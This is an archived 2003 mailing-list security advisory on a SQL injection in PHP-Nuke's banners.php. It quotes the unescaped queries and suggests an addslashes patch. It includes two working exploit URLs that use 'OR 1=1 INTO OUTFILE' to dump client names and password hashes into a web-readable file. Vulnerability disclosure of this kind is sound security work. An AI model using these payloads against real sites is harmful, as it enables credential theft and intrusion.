[VulnWatch] PHP-Nuke : banners.php

From: Frog Man (leseulfrog@hotmail.com)
Date: 03/22/03

  • Next message: Frog Man: "[VulnWatch] PHP-Nuke, 'News' module : Big Security Holes"
    From: "Frog Man" <leseulfrog@hotmail.com>
    To: bugtraq@securityfocus.com
    Date: Sat, 22 Mar 2003 14:35:19 +0100
    
    

    Informations :
    °°°°°°°°°°°°°°
    language : PHP
    Website : http://www.phpnuke.org
    Versions : 5.6, 6.0, 6.5 RC1, 6.5 RC2, 6.5 RC3, 6.5
    Problem : SQL Injection
    Config : This will work if magic_quotes_gpc=OFF

    PHP Code/Location :
    °°°°°°°°°°°°°°°°°°°
    banners.php :
    ------------------------------------------------------------------------
    [...]
    function bannerstats($login, $pass) {
        global $prefix, $db, $sitename;
        $sql = "SELECT cid, name, passwd FROM ".$prefix."_bannerclient WHERE
    login='$login'";
        $result = $db->sql_query($sql);
        $row = $db->sql_fetchrow($result);
    [...]

    function change_banner_url_by_client($login, $pass, $cid, $bid, $url,
    $alttext) {
        global $prefix, $db;
        $sql = "SELECT passwd FROM ".$prefix."_bannerclient WHERE cid='$cid'";
        $result = $db->sql_query($sql);
        $row = $db->sql_fetchrow($result);
        $passwd = $row[passwd];
        if (!empty($pass) AND $pass==$passwd) {
            $alttext = ereg_replace("\"", "", $alttext);
            $alttext = ereg_replace("'", "", $alttext);
            $db->sql_query("UPDATE ".$prefix."_banner SET clickurl='$url',
    alttext='$alttext' WHERE bid='$bid'");
            echo "<br><center>";
            if ($url != "") {
                echo "You changed the URL<br>";
            }
            if ($alttext != "") {
                echo "You changed the Alternate Text";
            }
            echo "<br><br><a href=\"javascript:history.go(-1)\">Back to Stats
    Page</a></center>";
        } else {
            echo "<center><br>Your login/password doesn't match.<br><br>Please <a
    href=\"banners.php?op=login\">login again</a></center>";
        }

    }

    switch($op) {

    [...]

        case "Ok":
            bannerstats($login, $pass);
            break;

        case "Change":
            change_banner_url_by_client($login, $pass, $cid, $bid, $url, $alttext);
            break;

    }
    [...]

    ?>
    ------------------------------------------------------------------------

    Exploit :
    °°°°°°°°°
    This will save id, name and crypted password into
    http://[target]/banners1.txt :
    http://[target]/banners.php?op=Ok&login='%20OR%201=1%20INTO%20OUTFILE%20'[path/to/site]/banners1.txt

    This will save crypted password into http://[target]/banners2.txt :
    http://[target]/banners.php?op=Change&cid='%20OR%201=1%20INTO%20OUTFILE%20'[path/to/site]/banners2.txt

    Patch :
    °°°°°°°
    A patch can be found on http://www.phpsecure.info .
    Into banners.php, put befoire the switch :
    --------------------------
    $cid=addslashes($cid);
    $login=addslashes($login);
    --------------------------

    More details :
    °°°°°°°°°°°°°°
    in French :
    http://www.frogsecure.com/tutos/PHP-Nuke-banners.php.txt

    frog-m@n

    _________________________________________________________________
    Hotmail: votre e-mail gratuit ! http://www.fr.msn.be/hotmail


  • Next message: Frog Man: "[VulnWatch] PHP-Nuke, 'News' module : Big Security Holes"

    Relevant Pages